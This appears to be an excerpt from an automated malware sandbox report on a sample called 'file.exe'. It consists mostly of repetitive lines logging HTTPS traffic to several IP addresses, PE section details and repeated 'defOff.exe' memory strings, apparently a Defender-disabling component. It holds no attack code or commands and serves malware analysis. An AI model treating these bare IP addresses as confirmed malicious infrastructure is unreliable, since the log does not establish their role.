              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.5:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.5:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49831 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exe, 00000000.00000003.2410786228.000000000633A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401546717.00000000061EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401985525.00000000062D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2391695962.00000000061E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2408475568.000000000632A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2410115054.000000000633A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392729622.000000000631B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397484793.000000000633C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400079869.00000000061E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399093694.00000000061E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402257768.00000000061E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401085505.00000000062CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2409563014.0000000006478000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405169399.000000000630B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401660958.00000000062D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405908930.0000000006310000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2407592802.0000000006317000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404922941.000000000640F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406963557.00000000061E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400731239.00000000062C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402649947.00000000063D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2391621164.0000000006049000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2410444311.00000000061E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2396522870.00000000061E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401189780.00000000061E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404798869.00000000062F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2407406824.00000000061E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400619057.00000000061E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400188088.00000000062C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398087340.00000000061EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399963450.00000000062B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2408147090.000000000632C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400295082.00000000061E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399858913.00000000061EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399194048.00000000062AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403007486.00000000062EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405046519.00000000061E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393405778.00000000061EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2391573622.0000000005E42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393522094.0000000006289000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398188481.0000000006298000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2408927679.000000000632E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400402624.00000000062BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398778718.00000000061E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404556898.00000000062FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399423093.00000000062AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398484637.00000000061E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398385319.000000000629D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398285593.00000000061E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406055962.000000000643F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403849916.00000000062FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405573963.00000000061E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400847328.00000000063AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2407767001.000000000645A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404678347.00000000061E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2407986846.00000000061EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392240625.00000000061EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405294169.00000000061E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403705622.00000000061EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2426074629.000000000161C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2426101193.000000000162A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393630886.00000000061E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403474935.00000000063F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397824870.00000000061EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2552790935.0000000006736000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403179817.00000000061E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400507838.0000000006398000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402768314.00000000061E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406561135.00000000061ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406458265.000000000643A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399300852.00000000061EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402109684.00000000063CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401425343.00000000063C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393974187.0000000006284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2395155944.00000000061E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2408671660.00000000061E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2552011500.0000000006490000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404318095.00000000063FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2407097008.000000000631E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399642328.00000000061E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403299979.00000000062E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406829845.000000000644D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398685255.000000000635F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2409833996.00000000061E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2391790328.000000000604A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402493475.00000000062DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392645126.000000000627A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404038674.00000000061E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401307284.00000000062D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404169346.00000000062E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404437444.00000000061E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401869872.00000000061E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400970106.00000000061E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406698998.0000000006312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398891737.00000000062AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2396335039.0000000006285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399758700.00000000062B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
